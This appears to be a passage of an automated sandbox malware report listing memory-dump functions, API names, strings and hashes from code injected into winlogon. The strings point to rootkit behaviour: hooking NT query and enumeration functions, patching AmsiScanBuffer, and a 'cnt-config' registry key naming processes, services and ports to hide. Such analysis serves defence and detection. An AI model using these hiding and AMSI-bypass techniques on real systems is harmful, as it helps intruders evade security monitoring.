                          • Instruction ID: bead2ac1358e17f089f294fb4c756c1d3e3800fd4e757aed294e48ae8c095ac3
                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                          • Instruction Fuzzy Hash: 58D01236B32644C3F301DB51D855BD67729FB98705FC04005E94982694DF7DC259CF92
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction ID: c99db775f95ad49f63960b31de7368144e072af91cd50a58f6ca275a580b9347
                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction Fuzzy Hash: 26B16F33A5479882FB669F25D400BD9B3A6FB44B98F94901AEE0953794DA37CD42C3C3
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction ID: b08fb8c50f464ed379093d9854270921c734b56c222001deaac93b1b99a5f4bc
                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction Fuzzy Hash: 65319273604B8496FB618F60E880BED7370FB84758F84812ADA4E47B94DF39C649C796
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction ID: e21dcb0928847e0ad1ab47b3b2793bd05313454e03d703009cfb91f4e3bedbc5
                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction Fuzzy Hash: FD41C537614F8486E761CF24E8407DE73A4FB88758F904119EA9D47B94DF39C146CB82
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction ID: 45d124b7b65d76756e98c7d09d685b6f4212555c67c952a88febd89221c6fea2
                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction Fuzzy Hash: 1AA1E633B4478889FB22DB759440BED7BA0BB8179CF9881199E5527A95CA3BC043C7C3
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction ID: bca9c8bf826c505011b38fd6b5f6bfe9104125b42424f6945c05f756906d2787
                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction Fuzzy Hash: C8A10633B4478849FB229B75E440BED7BA0BB81B9DF9C4115DA492BA95DA36C041C343

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 2135414181-2609720707
                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction ID: 2c83494e5a43262cfe800e831b7ec8651a9dabb613aca94f4580080f8d60cd14
                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction Fuzzy Hash: CD711737B50B1985FB229F21E850AD833A4FF88B8CF819115ED4D47A28DE3AC546C3C6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                          • API String ID: 1735320900-4225371247
                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction ID: c27b5b2766e8a714269c9b7251a9534395d3fbc0594a058b2d3d4c984f6c3e2e
                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction Fuzzy Hash: 47517A72A90B0EA5FB039B68E842ED83324BF4475CFC18916A40902575DE7BD25BC3E7
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction ID: 10435c65013aa49502dc7abc10a9fb8f475a20879a614cbceb8abb604b999947
                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction Fuzzy Hash: E5516033A50B8896F722CF62E44979A77A1FB88F98F858124DE4907718DF3DD046C782
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 740688525-1880043860
                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction ID: 841100cd2b18d10c7530346504741f059c760433718e5c958d51dca8c66ea59f
                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction Fuzzy Hash: 79518F33B4170851FA169B56A800BE57250BF48BB8FD88729AE3D073D4DF3AD54686C7
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Running Time
                          • API String ID: 1943346504-1805530042
                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction ID: 752b222f9f1cd9264d68c2c53bbe3c21249311e990f53d32d649b7497d1e9cf2
                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction Fuzzy Hash: 1A31E933E44B5896F722CF12A404B99B391FB88B98FC48528AD4843624DF3AD44383C6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Utilization Percentage
                          • API String ID: 1943346504-3507739905
                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction ID: 01238701deea32749901f043c41a85233535f38141b80a811341c7053083115b
                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction Fuzzy Hash: 9D31B433A44B4996F712DF12A444B9973A1BF88F98F858129DE4A43724DF3AE44782C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction ID: 93558ce561f458a496548046fa9771a477e4b847544d87466bd0439cd31ff69d
                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction Fuzzy Hash: B2D1AC33A447888AFB62CB659540BDD77A0FB4578CF908119EA8957B96CB36C482C7C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                          • Instruction ID: db454895896c66f2aae9d4fb35f949d79ab27abdbeef052a67be09c4d4be01c7
                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                          • Instruction Fuzzy Hash: E8D17C33A44B488AFB629F65D480BED77A0FB45B8CF900115EA8D57B96DB35C082C783
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction ID: 8a4b5a10e027ae3e9ee44e0ca111a6274b15f8be53a4c776a450907aef51b4fb
                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction Fuzzy Hash: 9A41A133614B88C6F761CF21E44479EB7A1F788B98F848119EA8907758DF3ED446CB92
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                          • String ID: \\.\pipe\$cnt-childproc
                          • API String ID: 166002920-175842701
                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction ID: 4ae2b1dd0165a769ae8a6f1806b14cc66bc568eb7fc37f487b2a6e2550b0d5b4
                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction Fuzzy Hash: 6D117F32A18B4482F7118B21F854B997760FB88BD8FD44314EA5906AA8CF3DC146CBC6
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: 2ef598056096b3bfdeabdf0bab39421e006454b166941b32e9cc3945e4c11726
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: AB817133E8034C96FA52AB659481BD97291BFC578CFD4C02DA98947796DB3BC84782C3
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: 24616cbd0e12550494a136588df692ffe9cf0816aba21efa28764c3b263d334b
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: 8881CF73F8434C46FA53AB6D9841BD93291BF8678CFD45025998C47396DA3BC882C783
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B31
                          • GetLastError.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B3F
                          • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B69
                          • FreeLibrary.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BD7
                          • GetProcAddress.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction ID: 913e52812023985531484c69a56f4c057774ccded8e0e9709dbdd399596a43e9
                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction Fuzzy Hash: 0731A333A5274881FE13DB069800BE53395BF44BA8FA98528AD2946794DE3BD54683C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction ID: 8aae48f47a9bb66e9edd86841ba13e019cb2a79eb4afd0458ea2895297c6a3c3
                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction Fuzzy Hash: 8511B132B54B4482F3528B52F854B5976A4FB88BE8F814214EA5D87B94CF3AC50187C6
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction ID: 813dea70fcca1b133d49793039452a6eb6565c05de3bdde15a2486de481bcc61
                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
